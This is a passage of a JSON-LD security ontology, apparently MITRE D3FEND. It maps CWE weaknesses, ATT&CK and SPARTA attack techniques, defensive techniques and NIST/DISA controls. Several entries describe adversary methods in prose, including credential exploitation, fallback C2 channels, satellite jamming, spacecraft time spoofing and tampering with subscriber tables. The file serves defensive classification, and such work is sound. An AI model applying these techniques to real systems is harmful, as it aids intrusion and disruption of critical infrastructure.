          "@id": "https://arxiv.org/abs/1911.02685"
        },
        {
          "@id": "https://journalofbigdata.springeropen.com/articles/10.1186/s40537-016-0043-6"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:CWE-58",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-58",
      "d3f:definition": "The product contains a protection mechanism that restricts access to a long filename on a Windows operating system, but it does not properly restrict access to the equivalent short \"8.3\" filename.",
      "rdfs:label": "Path Equivalence: Windows 8.3 Filename",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:CWE-106",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-106",
      "d3f:definition": "When an application does not use an input validation framework such as the Struts Validator, there is a greater risk of introducing weaknesses related to insufficient input validation.",
      "rdfs:label": "Struts: Plug-in Framework not in Use",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:AuthorizationEventThresholding",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AuthorizationEventThresholding"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Authorization"
      },
      "d3f:created": {
        "@type": "xsd:dateTime",
        "@value": "2020-08-05T00:00:00"
      },
      "d3f:d3fend-id": "D3-AZET",
      "d3f:definition": "Collecting authorization events, creating a baseline user profile, and determining whether authorization events are consistent with the baseline profile.",
      "d3f:kb-article": "## How it works\n\nAuthorization event data is collected to create a baseline user profile. Authorization events that deviate from the baseline and exceed a static or dynamic threshold are identified for further action. Authorization events can include successful and failed authorization attempts as well as events related to permissions including viewing, editing, deleting, creating files, databases etc.\n\n## Considerations\n\nDepending on the complexity of the data considered, outliers may not be obvious to a human analyst reviewing events in simplistic analytic views. If malicious activity is not statistically different from benign activity, an alert threshold will not be met.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC"
        },
        {
          "@id": "d3f:Reference-SMBSessionSetups_MITRE"
        },
        {
          "@id": "d3f:Reference-UserLoggedInToMultipleHosts_MITRE"
        },
        {
          "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc"
        }
      ],
      "rdfs:label": "Authorization Event Thresholding",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N8f6a42f0fc5c4c37b84a3a82ec18238a"
        }
      ]
    },
    {
      "@id": "_:N8f6a42f0fc5c4c37b84a3a82ec18238a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "d3f:CWE-532",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-532",
      "d3f:definition": "The product writes sensitive information to a log file.",
      "rdfs:label": "Insertion of Sensitive Information into Log File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-538"
      }
    },
    {
      "@id": "d3f:Reference-NIST-Special-Publication-800-41-Revision-1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.SP.800-41r1"
      },
      "d3f:kb-abstract": "Firewalls are devices or programs that control the flow of network traffic between networks or hosts employing differing security postures. This publication provides an overview of several types of firewall technologies and discusses their security capabilities and their relative advantages and disadvantages in detail. It also makes recommendations for establishing firewall policies and for selecting, configuring, testing, deploying, and managing firewall solutions.",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:Endpoint-basedWebServerAccessMediation"
        },
        {
          "@id": "d3f:Proxy-basedWebServerAccessMediation"
        },
        {
          "@id": "d3f:WebSessionAccessMediation"
        }
      ],
      "d3f:kb-reference-title": "Special Publication 800-41 Revision 1 Guidelines on Firewalls and Firewall Policy",
      "rdfs:label": "Reference - Special Publication 800-41 Revision 1 Guidelines on Firewalls and Firewall Policy"
    },
    {
      "@id": "d3f:WindowsSuspendThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Suspends the specified thread.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtSuspendThread"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-suspendthread"
      },
      "rdfs:label": "Windows SuspendThread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISuspendThread"
        },
        {
          "@id": "_:Nd904f79b9a04471d891d2ad98df04299"
        }
      ]
    },
    {
      "@id": "_:Nd904f79b9a04471d891d2ad98df04299",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtSuspendThread"
      }
    },
    {
      "@id": "d3f:Reference-RFC3411-AnArchitectureForDescribingSimpleNetworkManagementProtocolSNMPManagementFrameworks",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://https://datatracker.ietf.org/doc/html/rfc3411"
      },
      "d3f:kb-author": "D. Harrington, R. Presuhn, B. Wijnen",
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:HardwareComponentInventory"
      },
      "d3f:kb-reference-title": "An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks",
      "rdfs:label": "Reference - An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks"
    },
    {
      "@id": "d3f:CWE-1264",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1264",
      "d3f:definition": "The hardware logic for error handling and security checks can incorrectly forward data before the security check is complete.",
      "rdfs:label": "Hardware Logic with Insecure De-Synchronization between Control and Data Channels",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-821"
      }
    },
    {
      "@id": "d3f:CWE-104",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-104",
      "d3f:definition": "If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation.",
      "rdfs:label": "Struts: Form Bean Does Not Extend Validation Class",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:TimerModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which the duration or expiration time of an active timer is changed.",
      "rdfs:label": "Timer Modification Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwareTimerEvent"
      }
    },
    {
      "@id": "d3f:TrimmedMean",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TM",
      "d3f:definition": "The arithmetic mean of data values after a certain number or proportion of the highest and lowest data values have been discarded.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Central tendency. [Link](https://en.wikipedia.org/wiki/Central_tendency)",
      "d3f:synonym": "Truncated mean",
      "rdfs:label": "Trimmed Mean",
      "rdfs:subClassOf": {
        "@id": "d3f:CentralTendency"
      }
    },
    {
      "@id": "d3f:TA0006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to steal account names and passwords.\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.",
      "d3f:display-order": 6,
      "rdfs:label": "Credential Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:T1585.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1585.001",
      "d3f:definition": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)",
      "rdfs:label": "Social Media Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1585"
      }
    },
    {
      "@id": "d3f:ImportLibraryFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Loads an external software library to enable the invocations of its methods.",
      "d3f:loads": {
        "@id": "d3f:SharedLibraryFile"
      },
      "rdfs:label": "Import Library Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N9cb19f34064d4485a98a0fefc5355fe4"
        }
      ]
    },
    {
      "@id": "_:N9cb19f34064d4485a98a0fefc5355fe4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:EX-0012.04",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.04",
      "d3f:definition": "In publish/subscribe flight frameworks, applications and subsystems register interest in specific message classes via subscriber (or application) tables. These tables map message IDs/topics to subscribers, define delivery pipes/queues, and often include filters, priorities, and rate limits. By altering these mappings, an adversary can quietly reshape information flow: critical consumers stop receiving health or sensor messages; non-critical tasks get flooded; handlers are rebound so an opcode or message ID reaches the wrong task; or duplicates create feedback loops that consume bandwidth and CPU. Because subscription state is usually read at init or refreshed on command, subtle edits can persist across reboots or take effect at predictable times. Similar effects appear in legacy MIL-STD-1553 deployments by modifying Remote Terminal (RT), subaddress, or mode-code configurations so that messages are misaddressed or dropped at the bus interface. The net result is control-by-misdirection: the software still “works,” but the right data no longer reaches the right recipient at the right time.",
      "rdfs:label": "App/Subscriber Tables - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "App/Subscriber Tables"
    },
    {
      "@id": "d3f:CCI-002425_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to conceal or randomize communication patterns unless otherwise protected by organization-defined alternative physical safeguards.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002425"
    },
    {
      "@id": "d3f:TimeRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A time record either records, describes, represents, or is generally about Time.",
      "d3f:records": {
        "@id": "d3f:Time"
      },
      "rdfs:label": "Time Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Record"
        },
        {
          "@id": "_:N49c85fc69e3e431e8e829728ceb7e3be"
        }
      ]
    },
    {
      "@id": "_:N49c85fc69e3e431e8e829728ceb7e3be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:records"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Time"
      }
    },
    {
      "@id": "d3f:Simulation",
      "@type": "owl:Class",
      "rdfs:label": "Simulation",
      "rdfs:subClassOf": {
        "@id": "d3f:Generation"
      }
    },
    {
      "@id": "d3f:PolicyGradient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PG",
      "d3f:definition": "The objective of a Reinforcement Learning Policy Gradient agent is to maximize the “expected” reward when following a policy",
      "d3f:kb-article": "## References\nPolicy Gradients in a Nutshell. Towards Data Science.  [Link](https://towardsdatascience.com/policy-gradients-in-a-nutshell-8b72f9743c5d).",
      "rdfs:label": "Policy Gradient",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-freeReinforcementLearning"
      }
    },
    {
      "@id": "d3f:T1212",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1212",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. ",
      "d3f:may-access": [
        {
          "@id": "d3f:AuthenticationService"
        },
        {
          "@id": "d3f:CredentialManagementSystem"
        }
      ],
      "d3f:may-modify": [
        {
          "@id": "d3f:ProcessCodeSegment"
        },
        {
          "@id": "d3f:StackFrame"
        }
      ],
      "rdfs:label": "Exploitation for Credential Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N19821680ff2f4186938007f0e991a577"
        },
        {
          "@id": "_:N9ed7732fff344df79e17b07b2339a9d2"
        },
        {
          "@id": "_:Nf332db5f1d1944a2ac3472ee483c14c0"
        },
        {
          "@id": "_:N383886db24c74f4a94485222ad998ae2"
        }
      ]
    },
    {
      "@id": "_:N19821680ff2f4186938007f0e991a577",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "_:N9ed7732fff344df79e17b07b2339a9d2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CredentialManagementSystem"
      }
    },
    {
      "@id": "_:Nf332db5f1d1944a2ac3472ee483c14c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "_:N383886db24c74f4a94485222ad998ae2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:WebResource",
      "@type": "owl:Class",
      "d3f:definition": "A web resource is a resource identified by a Uniform Resource Identifier (URI) and made available from one host to another host via a web protocol and across a network or networks.",
      "rdfs:label": "Web Resource",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Web_resource"
        },
        {
          "@id": "https://schema.ocsf.io/objects/web_resource"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "d3f:EX-0016",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0016",
      "d3f:definition": "Jamming is an electronic attack that uses radio frequency signals to interfere with communications. A jammer must operate in the same frequency band and within the field of view of the antenna it is targeting. Unlike physical attacks, jamming is completely reversible, once the jammer is disengaged, communications can be restored. Attribution of jamming can be tough because the source can be small and highly mobile, and users operating on the wrong frequency or pointed at the wrong satellite can jam friendly communications.* Similiar to intentional jamming, accidential jamming can cause temporary signal degradation. Accidental jamming refers to unintentional interference with communication signals, and it can potentially impact spacecraft in various ways, depending on the severity, frequency, and duration of the interference.\n\n*https://aerospace.csis.org/aerospace101/counterspace-weapons-101",
      "rdfs:label": "Jamming - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0016/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Jamming"
    },
    {
      "@id": "d3f:OTNetworkManagementCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Manage message routing or network connection mechanisms.",
      "rdfs:label": "OT Network Management Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEvent"
        },
        {
          "@id": "_:N9e87922684fe4cb082572450b8eb6709"
        }
      ]
    },
    {
      "@id": "_:N9e87922684fe4cb082572450b8eb6709",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTNetworkManagementCommand"
      }
    },
    {
      "@id": "d3f:Software-definedRadioWaveformLoadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An SDR event where a waveform application (software/firmware/FPGA image and associated descriptors) has been installed or selected on the SDR and is available to be configured.",
      "rdfs:label": "Software-defined Radio Waveform Application Load Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software-definedRadioEvent"
        },
        {
          "@id": "_:N5653ad754f6140228a984395641ffe9e"
        },
        {
          "@id": "_:N9eda2b4c4b7f4708a334f9d71340f0eb"
        }
      ]
    },
    {
      "@id": "_:N5653ad754f6140228a984395641ffe9e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioComputer"
      }
    },
    {
      "@id": "_:N9eda2b4c4b7f4708a334f9d71340f0eb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      }
    },
    {
      "@id": "d3f:LinuxMunmap",
      "@type": "owl:Class",
      "d3f:definition": "Unmap files or devices from memory.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/munmap.2.html"
      },
      "rdfs:label": "Linux Munmap",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIFreeMemory"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-2_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Flaw Remediation | Automatic Software and Firmware Updates",
      "d3f:exactly": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "d3f:PeripheralFirmwareVerification"
        },
        {
          "@id": "d3f:SoftwareUpdate"
        },
        {
          "@id": "d3f:SystemFirmwareVerification"
        }
      ],
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SI-2(5)"
    },
    {
      "@id": "d3f:T1536",
      "@type": "owl:Class",
      "d3f:attack-id": "T1536",
      "d3f:definition": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1578.004",
      "rdfs:label": "Revert Cloud Instance",
      "rdfs:seeAlso": {
        "@id": "d3f:T1578.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:EX-0014.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0014.01",
      "d3f:definition": "Time underpins sequencing, anti-replay, navigation filtering, and data labeling. An attacker that forges or biases the time seen by onboard consumers can reorder stored command execution, break timetag validation, desynchronize counters, and misalign estimation windows. Spoofing vectors include manipulating the distributed time service, introducing a higher-priority/cleaner time source (e.g., GNSS-derived time), or crafting messages that cause clock discipline to slew toward attacker-chosen values. Once time shifts, autonomous routines keyed to epochs — wheel unloads, downlink starts, heater schedules — fire early/late or not at all, and telemetry appears inconsistent to ground analysis. The signature is correct-looking time metadata that steadily or abruptly departs from truth, driving downstream logic to act at the wrong moment.",
      "rdfs:label": "Time Spoof - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0014"
      },
      "skos:prefLabel": "Time Spoof"
    },
    {
      "@id": "d3f:Reference-InferentialExploitAttemptDetection_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10216934B2/en?oq=US-10216934-B2"
      },
      "d3f:kb-abstract": "A security agent implemented on a monitored computing device is described herein. The security agent is configured to detect an action of interest (AoI) that may be probative of a security exploit and to determine a context in which that AoI occurred. Based on that context, the security agent is further configured to decide whether the AoI is a security exploit and can take preventative action to prevent the exploit from being completed.\n\nDetermining that the AoI includes the security exploit is based at least in part on one or more of: determining that the return address is outside memory previously allocated for an object; determining that the object identifier is associated with a vulnerable object; determining that permissions of the memory region include two or more of read, write, and execute; or determining that the memory region is one page in length.\n\nDetermining that the return address is outside memory previously allocated for an object and the method further including treating code that the return address points to as malicious code.",
      "d3f:kb-author": "Daniel W. Brown; Ion-Alexandru Ionescu; Loren C. Robinson",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:MemoryBoundaryTracking"
      },
      "d3f:kb-reference-title": "Inferential exploit attempt detection",
      "rdfs:label": "Reference - Inferential exploit attempt detection - Crowdstrike Inc"
    },
    {
      "@id": "d3f:Event",
      "@type": "owl:Class",
      "d3f:definition": "An Event is an occurrence or action within a system, process, or environment within a finite span of time.",
      "rdfs:label": "Event",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:CWE-184",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-184",
      "d3f:definition": "The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.",
      "d3f:synonym": [
        "Blacklist / Black List",
        "Blocklist / Block List",
        "Denylist / Deny List"
      ],
      "rdfs:label": "Incomplete List of Disallowed Inputs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1023"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:GraphicsProcessingUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:GraphicsCardFirmware"
      },
      "d3f:definition": "A Graphics Processing Unit (GPU) is a specialized processor designed to efficiently perform parallel computations, primarily for rendering graphics and visual data.",
      "d3f:synonym": "GPU",
      "rdfs:label": "Graphics Processing Unit",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Processor"
        },
        {
          "@id": "_:Nfaa3aa015a7d48bca797de9f165db743"
        }
      ]
    },
    {
      "@id": "_:Nfaa3aa015a7d48bca797de9f165db743",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GraphicsCardFirmware"
      }
    },
    {
      "@id": "d3f:ProcessLineageAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessLineageAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:Process"
        },
        {
          "@id": "d3f:ProcessTree"
        }
      ],
      "d3f:d3fend-id": "D3-PLA",
      "d3f:definition": "Identification of suspicious processes executing on an end-point device by examining the ancestry and siblings of a process, and the associated metadata of each node on the tree, such as process execution, duration, and order relative to siblings and ancestors.",
      "d3f:kb-article": "## How it works\nProcess tree analysis techniques gather information on how a process was initiated to determine if a process is malicious. For example, if a process was not initiated from boot or not initiated by another process, that process is identified as suspicious. Also, if a new process was started before a process initiated by the device (e.g., during boot) and that new process was not initiated by a user (which can be determined by examining process parameters such as type of process, its creator, source, etc.), the process is identified as suspicious.\n\nFor example, Microsoft Word may block execution of any subprocess that is not in an approved path.\n\n## Considerations\n* Attackers may spoof the parent PID (https://attack.mitre.org/techniques/T1502/), rendering such after-the-fact analysis of process lineage ineffective.\n* Processes may hide from various means of detection; an example on Linux is where a rootkit might remove key files for the process from its directory in /proc.\n* Zombie processes.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CommandLaunchedFromWinLogon_MITRE"
        },
        {
          "@id": "d3f:Reference-DebuggersForAccessibilityApplications_MITRE"
        },
        {
          "@id": "d3f:Reference-GenericRegsvr32_MITRE"
        },
        {
          "@id": "d3f:Reference-OutlierParentsOfCmd_MITRE"
        },
        {
          "@id": "d3f:Reference-ProcessesSpawningCmd.exe_MITRE"
        },
        {
          "@id": "d3f:Reference-QuickExecutionOfASeriesOfSuspiciousCommands_MITRE"
        },
        {
          "@id": "d3f:Reference-Reg.exeCalledFromCommandShell_MITRE"
        },
        {
          "@id": "d3f:Reference-RemotelyLaunchedExecutablesViaWMI_MITRE"
        },
        {
          "@id": "d3f:Reference-ServiceOutlierExecutables_MITRE"
        },
        {
          "@id": "d3f:Reference-ServiceSearchPathInterception_MITRE"
        },
        {
          "@id": "d3f:Reference-ServicesLaunchingCmd_MITRE"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodsThereofForCausalityIdentificationAndAttributionsDeterminationOfProcessesInANetwork_PaloAltoNetworksIncCyberSecdoLtd"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodsThereofForIdentificationOfSuspiciousSystemProcesses_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-UACBypass_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-002%3ALocalNetworkSniffing_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-004%3AProcessesStartedFromIrregularParent_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-02-002%3AGetSystemElevation_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-003%3ABCDEditFailureRecoveryModification_MITRE"
        }
      ],
      "d3f:synonym": "Process Tree Analysis",
      "rdfs:label": "Process Lineage Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessSpawnAnalysis"
        },
        {
          "@id": "_:Ne33479ce26744f9da33e9a4b96ba65ab"
        },
        {
          "@id": "_:Nacc7ed2da52e4d29ade80666992061fc"
        }
      ]
    },
    {
      "@id": "_:Ne33479ce26744f9da33e9a4b96ba65ab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:Nacc7ed2da52e4d29ade80666992061fc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessTree"
      }
    },
    {
      "@id": "d3f:CCI-001682_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically removes or disables emergency accounts after an organization-defined time period for each type of account.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001682"
    },
    {
      "@id": "d3f:ARM32CodeSegment",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ImageCodeSegment",
        "d3f:ProcessCodeSegment"
      ],
      "rdfs:label": "ARM32 Code Segment"
    },
    {
      "@id": "d3f:Reference-CPGChecklist",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cisa.gov/resources-tools/resources/cisa-cpg-checklist"
      },
      "d3f:kb-abstract": "This document is to be used in tandem with the CPGs to help prioritize and track your organization's implementation.",
      "d3f:kb-author": "CISA",
      "d3f:kb-reference-of": {
        "@id": "d3f:ChangeDefaultPassword"
      },
      "d3f:kb-reference-title": "CISA CPG Checklist",
      "rdfs:label": "Reference - CISA CPG Checklist"
    },
    {
      "@id": "d3f:T1008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1008",
      "d3f:definition": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Fallback Channels",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N70d3fa69e9a147d6b8269340702dc103"
        }
      ]
    },
    {
      "@id": "_:N70d3fa69e9a147d6b8269340702dc103",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:BSDProcess",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Process"
      ],
      "rdfs:label": "BSD Process"
    },
    {
      "@id": "d3f:CCI-000880_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization audits non-local maintenance and diagnostic sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OperatingSystemMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000880"
    },
    {
      "@id": "d3f:AML.T0043.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043.002",
